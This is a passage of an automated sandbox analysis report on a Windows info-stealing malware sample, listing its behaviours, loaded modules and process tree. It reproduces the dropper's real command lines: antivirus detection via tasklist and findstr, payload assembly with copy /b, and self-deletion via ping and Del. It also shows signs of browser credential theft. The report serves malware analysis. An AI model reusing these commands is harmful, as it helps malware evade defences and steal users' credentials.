Source: Milfs.pif, 0000000A.00000003.2546652759.0000000002F67000.00000004.00000800.00020000.00000000.sdmp, JKEBFBFIEHIDAAAAFHCFCGIECB.10.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: JKEBFBFIEHIDAAAAFHCFCGIECB.10.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Milfs.pif, 0000000A.00000003.2546652759.0000000002F67000.00000004.00000800.00020000.00000000.sdmp, JKEBFBFIEHIDAAAAFHCFCGIECB.10.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004050CD
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004044A5
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx, 0_2_00403883
Creates files inside the system directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\GuyanaBathrooms Jump to behavior
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\UsbIds Jump to behavior
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\PracticeUsual Jump to behavior
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\JordanMoved Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040497C 0_2_0040497C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00406ED2 0_2_00406ED2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004074BB 0_2_004074BB
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 004062A3 appears 57 times
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000003.1666983273.00000000029C9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAutoIt3.exeB vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@32/54@1/3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004044A5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004024FB CoCreateInstance, 0_2_004024FB
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\5WWAJ514.htm Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4996:120:WilError_03
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6220:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5912:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\nsn98A7.tmp Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Taken Taken.bat & Taken.bat
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3.dll.10.dr, softokn3[1].dll.10.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: nss3[1].dll.10.dr, nss3.dll.10.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.10.dr, softokn3[1].dll.10.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: nss3[1].dll.10.dr, nss3.dll.10.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: nss3[1].dll.10.dr, nss3.dll.10.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: softokn3.dll.10.dr, softokn3[1].dll.10.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: nss3[1].dll.10.dr, nss3.dll.10.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.10.dr, softokn3[1].dll.10.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.10.dr, softokn3[1].dll.10.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.10.dr, softokn3[1].dll.10.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3.dll.10.dr, softokn3[1].dll.10.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: nss3[1].dll.10.dr, nss3.dll.10.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: nss3[1].dll.10.dr, nss3.dll.10.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3.dll.10.dr, softokn3[1].dll.10.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: Milfs.pif, 0000000A.00000003.2479739113.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, KFHJJDHJEGHJKECBGCFH.10.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: softokn3.dll.10.dr, softokn3[1].dll.10.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: softokn3.dll.10.dr, softokn3[1].dll.10.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Taken Taken.bat & Taken.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 87551
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "developmentplaintiffdisturbedconstruction" Flesh
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Horizontal + ..\Comparisons + ..\Evolution + ..\Frog + ..\Could + ..\Professor + ..\Prospect p
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Milfs.pif p
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsFCFBGIDAEH.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\DocumentsFCFBGIDAEH.exe "C:\Users\user\DocumentsFCFBGIDAEH.exe"
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\user\DocumentsFCFBGIDAEH.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 2.2.2.2 -n 1 -w 3000
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Taken Taken.bat & Taken.bat Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 87551 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "developmentplaintiffdisturbedconstruction" Flesh Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Horizontal + ..\Comparisons + ..\Evolution + ..\Frog + ..\Could + ..\Professor + ..\Prospect p Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Milfs.pif p Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsFCFBGIDAEH.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\DocumentsFCFBGIDAEH.exe "C:\Users\user\DocumentsFCFBGIDAEH.exe" Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\user\DocumentsFCFBGIDAEH.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 2.2.2.2 -n 1 -w 3000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\87551\Milfs.pif Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: freebl3.pdb source: freebl3.dll.10.dr, freebl3[1].dll.10.dr
Source: Binary string: mozglue.pdbP source: mozglue.dll.10.dr, mozglue[1].dll.10.dr
Source: Binary string: freebl3.pdbp source: freebl3.dll.10.dr, freebl3[1].dll.10.dr
Source: Binary string: nss3.pdb@ source: nss3[1].dll.10.dr, nss3.dll.10.dr
